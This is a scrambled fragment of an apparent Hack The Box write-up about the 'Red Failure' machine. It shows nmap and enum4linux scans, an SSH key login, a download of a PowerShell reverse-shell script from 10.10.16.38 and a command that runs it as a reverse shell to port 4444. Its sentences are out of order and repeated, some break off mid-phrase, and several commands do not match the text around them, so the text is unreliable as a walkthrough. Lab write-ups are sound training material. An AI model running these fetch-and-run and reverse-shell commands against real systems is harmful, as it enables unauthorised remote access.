Next, let's try to exploit any potential vulnerabilities on the machine. We can use the enum4linux tool to enumerate the SMB shares:
.\Invoke-PowerShellTcpip.ps1 -Reverse -Ip 10.10.16.38 -Port 4444
ssh -i id_rsa user@10.10.11.193 However, we find that the private key is encrypted and requires a passphrase. We can use the ssh2john tool to crack the passphrase: red failure htb
Invoke-WebRequest -Uri http://10.10.16.38:8080/Invoke-PowerShellTcpip.ps1 -OutFile Invoke-PowerShellTcpip.ps1 Then:
The Red Failure machine on Hack The Box is a challenging machine that requires a combination of enumeration, exploitation, and privilege escalation skills. In this blog post, we walked through the steps to exploit the machine and gain elevated privileges. If you're interested in trying out the machine yourself, head over to Hack The Box and give it a shot! Next, let's try to exploit any potential vulnerabilities
nmap -sV -p- 10.10.11.193 The scan reveals that the machine is running Windows Server 2019 and has several open ports, including RDP (3389), SMB (445), and HTTP (80).
enum4linux -a 10.10.11.193 The output reveals that there's a share called backup that we can access. Let's mount the share using smbclient : In this blog post, we walked through the
Let's try to use the private key to authenticate via SSH: